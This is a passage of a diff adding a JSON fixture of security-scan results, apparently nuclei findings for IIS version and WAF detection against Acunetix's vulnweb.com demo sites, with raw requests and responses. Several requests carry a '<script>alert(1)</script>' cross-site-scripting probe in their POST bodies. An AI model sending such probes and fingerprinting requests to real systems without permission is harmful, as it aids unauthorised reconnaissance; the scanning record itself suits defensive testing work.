IIS version detect", + "severity": 0, + "description": "Some Microsoft IIS servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"Microsoft-IIS/8.5\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:44:12.594Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/605.1.33 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.33\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nContent-Length: 1233\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:44:08 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>403 - Forbidden: Access is denied.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>403 - Forbidden: Access is denied.</h2>\r\n <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 5, + 33, + 34 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1029, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/waf-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/waf-detect", + "template_id": "waf-detect", + "matcher_name": "nginxgeneric", + "name": "WAF Detection", + "severity": 0, + "description": "A web application firewall was detected.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/Ekultek/WhatWaf']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'POST' -d '_=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://vulnweb.com'", + "type": "http", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:44:18.573Z", + "open_status": true, + "hackerone_report_id": null, + "request": "POST / HTTP/1.1\r\nHost: vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\r\nConnection: close\r\nContent-Length: 27\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\n_=<script>alert(1)</script>", + "response": "HTTP/1.1 405 Not Allowed\r\nConnection: close\r\nContent-Length: 559\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:44:18 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>405 Not Allowed</title></head>\r\n<body>\r\n<center><h1>405 Not Allowed</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 35, + 5, + 17 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1030, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/waf-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/waf-detect", + "template_id": "waf-detect", + "matcher_name": "nginxgeneric", + "name": "WAF Detection", + "severity": 0, + "description": "A web application firewall was detected.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/Ekultek/WhatWaf']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'POST' -d '_=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: www.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0' 'http://www.vulnweb.com'", + "type": "http", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:44:18.886Z", + "open_status": true, + "hackerone_report_id": null, + "request": "POST / HTTP/1.1\r\nHost: www.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0\r\nConnection: close\r\nContent-Length: 27\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\n_=<script>alert(1)</script>", + "response": "HTTP/1.1 405 Not Allowed\r\nConnection: close\r\nContent-Length: 157\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:44:18 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>405 Not Allowed</title></head>\r\n<body>\r\n<center><h1>405 Not Allowed</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 35, + 5, + 17 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1031, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/waf-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/waf-detect", + "template_id": "waf-detect", + "matcher_name": "aspgeneric", + "name": "WAF Detection", + "severity": 0, + "description": "A web application firewall was detected.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/Ekultek/WhatWaf']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'POST' -d '_=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: testasp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4854.116 Safari/537.36' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:44:19.243Z", + "open_status": true, + "hackerone_report_id": null, + "request": "POST /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4854.116 Safari/537.36\r\nConnection: close\r\nContent-Length: 27\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\n_=<script>alert(1)</script>", + "response": "HTTP/1.1 405 Method Not Allowed\r\nConnection: close\r\nContent-Length: 1293\r\nAllow: GET, HEAD, OPTIONS, TRACE\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:44:14 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>405 - HTTP verb used to access this page is not allowed.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>405 - HTTP verb used to access this page is not allowed.</h2>\r\n <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 35, + 5, + 17 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1032, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/waf-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/waf-detect", + "template_id": "waf-detect", + "matcher_name": "modsecurity", + "name": "WAF Detection", + "severity": 0, + "description": "A web application firewall was detected.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/Ekultek/WhatWaf']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'POST' -d '_=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: testasp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4854.116 Safari/537.36' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:44:19.542Z", + "open_status": true, + "hackerone_report_id": null, + "request": "POST /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4854.116 Safari/537.36\r\nConnection: close\r\nContent-Length: 27\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\n_=<script>alert(1)</script>", + "response": "HTTP/1.1 405 Method Not Allowed\r\nConnection: close\r\nContent-Length: 1293\r\nAllow: GET, HEAD, OPTIONS, TRACE\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:44:14 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>405 - HTTP verb used to access this page is not allowed.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>405 - HTTP verb used to access this page is not allowed.</h2>\r\n <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 35, + 5, + 17 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1033, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/waf-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/waf-detect", + "template_id": "waf-detect", + "matcher_name": "aspgeneric", + "name": "WAF Detection", + "severity": 0, + "description": "A web application firewall was detected.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/Ekultek/WhatWaf']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'POST' -d '_=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: testasp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0 Safari/600.1.25' 'http://testasp.vulnweb.com/%E2%80%93'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/%E2%80%93", + "discovered_date": "2024-11-13T02:44:19.921Z", + "open_status": true, + "hackerone_report_id": null, + "request": "POST /%E2%80%93 HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0 Safari/600.1.25\r\nConnection: close\r\nContent-Length: 27\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\n_=<script>alert(1)</script>", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nContent-Length: 1245\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:44:14 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>404 - File or directory not found.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>404 - File or directory not found.</h2>\r\n <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 35, + 5, + 17 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1034, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/waf-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/waf-detect", + "template_id": "waf-detect", + "matcher_name": "aspgeneric", + "name": "WAF Detection", + "severity": 0, + "description": "A web application firewall was detected.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/Ekultek/WhatWaf']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'POST' -d '_=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: testasp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0' 'http://testasp.vulnweb.com'", + "type": "http", + "http_url": "http://testasp.vulnweb.com", + "discovered_date": "2024-11-13T02:44:20.276Z", + "open_status": true, + "hackerone_report_id": null, + "request": "POST / HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0\r\nConnection: close\r\nContent-Length: 27\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\n_=<script>alert(1)</script>", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 3541\r\nCache-Control: private\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:44:14 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASPSESSIONIDSASBSTRC=HLCCLMIBHFACOFHJNJAGDPNL; path=/\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\r\n<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->\r\n<head>\r\n<!-- InstanceBeginEditable name="doctitle" -->\r\n<title>acuforum forums</title>\r\n<!-- InstanceEndEditable -->\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">\r\n<!-- InstanceBeginEditable name="head" -->\r\n<!-- InstanceEndEditable -->\r\n<link href="styles.css" rel="stylesheet" type="text/css">\r\n</head>\r\n<body> \r\n<table width="100%" border="0" cellpadding="10" cellspacing="0"> \r\n <tr bgcolor="#008F00"> \r\n <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> \r\n <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> \r\n - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> \r\n\t- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>\r\n </div></td> \r\n </tr> \r\n <tr> \r\n <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->\r\n\t<table width="100%" border="0" cellspacing="0" cellpadding="5">\r\n <tr>\r\n <td class="tableheader">Forum</td>\r\n <td class="tableheader">Threads</td>\r\n <td class="tableheader">Posts</td>\r\n <td class="tableheader">Last Post</td>\r\n </tr> \r\n\t<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>82</td><td>82</td><td>11/13/2024 2:31:30 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>\r\n\t</table><!-- InstanceEndEditable --></td> \r\n </tr> \r\n <tr align="right" bgcolor="#FFFFFF"> \r\n <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> \r\n </tr> \r\n</table> \r\n<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">\r\n\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>\r\n</div>\r\n</body>\r\n<!-- InstanceEnd --></html>\r\n", + "is_llm_used": false, + "tags": [ + 35, + 5, + 17 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 1035, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/waf-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/waf-detect", + "template_id": "waf-detect", + "matcher_name": "aspgeneric", + "name": "WAF Detection", + "severity": 0, + "description": "A web application firewall was detected.", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": "['https://github.com/Ekultek/WhatWaf']", + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'POST' -d '_=' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Host: testaspnet.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:44:20.633Z", + "open_status": true, + "hackerone_report_id": null, + "request": "POST / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nConnection: close\r\nContent-Length: 27\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip\r\n\r\n_=<script>alert(1)</script>", + "response": "HTTP/1.1 500 Internal Server Error\r\nConnection: close\r\nContent-Length: 6048\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:44:14 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n<html>\r\n <head>\r\n <title>A potentially dangerous Request.Form value was detected from the client (_=&quot;&lt;script&gt;alert(1)&lt;/sc...&quot;).</title>\r\n <style>\r\n body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} \r\n p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}\r\n b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}\r\n H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }\r\n H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }\r\n pre {font-family:"Lucida Console";font-size: .9em}\r\n .marker {font-weight: bold; color: black;text-decoration: none;}\r\n .version {color: gray;}\r\n .error {margin-bottom: 10px;}\r\n .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }\r\n </style>\r\n </head>\r\n\r\n <body bgcolor="white">\r\n\r\n <span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n\r\n <h2> <i>A potentially dangerous Request.Form value was detected from the client (_=&quot;&lt;script&gt;alert(1)&lt;/sc...&quot;).</i> </h2></span>\r\n\r\n <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">\r\n\r\n <b> Description: </b>Request Validation has detected a potentially dangerous client input value, and processing of the request has been aborted. This value may indicate an attempt to compromise the security of your application, such as a cross-site scripting attack. You can disable request validation by setting validateRequest=false in the Page directive or in the <pages> configuration section. However, it is strongly recommended that your application explicitly check all inputs in this case.\r\n <br><br>\r\n\r\n <b> Exception Details: </b>System.Web.HttpRequestValidationException: A potentially dangerous Request.Form value was detected from the client (_=&quot;&lt;script&gt;alert(1)&lt;/sc...&quot;).<br><br>\r\n\r\n <b>Source Error:</b> <br><br>\r\n\r\n <table width=100% bgcolor="#ffffcc">\r\n <tr>\r\n <td>\r\n <code><pre>\r\n\r\n[No relevant source lines]</pre></code>\r\n\r\n </td>\r\n </tr>\r\n </table>\r\n\r\n <br>\r\n\r\n <b> Source File: </b> c:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Temporary ASP.NET Files\\root\\e6eb278b\\4a52d72d\\App_Web_hnrrotav.2.cs<b> &nbsp;&nbsp; Line: </b> 0\r\n <br><br>\r\n\r\n <b>Stack Trace:</b> <br><br>\r\n\r\n <table width=100% bgcolor="#ffffcc">\r\n <tr>\r\n <td>\r\n <code><pre>\r\n\r\n[HttpRequestValidationException (0x80004005): A potentially dangerous Request.Form value was detected from the client (_=&quot;&lt;script&gt;alert(1)&lt;/sc...&quot;).]\r\n System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName) +11206219\r\n System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName) +71\r\n System.Web.HttpRequest.get_Form() +178\r\n System.Web.HttpRequest.get_HasForm() +11206455\r\n System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull) +124\r\n System.Web.UI.Page.DeterminePostBackMode() +83\r\n System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +11171879\r\n System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +11171418\r\n System.Web.UI.Page.ProcessRequest() +91\r\n System.Web.UI.Page.ProcessRequest(HttpContext context) +240\r\n ASP.default_aspx.ProcessRequest(HttpContext context) in c:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Temporary ASP.NET Files\\root\\e6eb278b\\4a52d72d\\App_Web_hnrrotav.2.cs:0\r\n System.Web.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() +599\r\n System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean&amp; completedSynchronously) +171\r\n</pre></code>\r\n\r\n </td>\r\n </tr>\r\n </table>\r\n\r\n <br>\r\n\r\n <hr width=100% size=1 color=silver>\r\n\r\n <b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:2.0.50727.8813; ASP.NET Version:2.0.50727.8951\r\n\r\n </font>\r\n\r\n </body>\r\n</html>\r\n<!-- \r\n[HttpRequestValidationException]: A potentially dangerous Request.Form value was detected from the client (_=&quot;&lt;script&gt;alert(1)&lt;/sc...&quot;).\r\n at System.Web.HttpRequest.ValidateString(String s, String valueName, String collectionName)\r\n at System.Web.HttpRequest.ValidateNameValueCollection(NameValueCollection nvc, String collectionName)\r\n at System.Web.HttpRequest.get_Form()\r\n at System.Web.HttpRequest.get_HasForm()\r\n at System.Web.UI.Page.GetCollectionBasedOnMethod(Boolean dontReturnNull)\r\n at System.Web.UI.Page.DeterminePostBackMode()\r\n at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)\r\n at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)\r\n at System.Web.UI.Page.ProcessRequest()\r\n at System.Web.UI.Page.ProcessRequest(HttpContext context)\r\n at ASP.default_aspx.ProcessRequest(HttpContext context) in c:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Temporary ASP.NET Files\\root\\e6eb278b\\4a52d72d\\App_Web_hnrrotav.2.cs:line 0\r\n at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()\r\n at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)\r\n--><!-- \r\nThis error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->", + "is_llm_used": false, + "tags": [ + 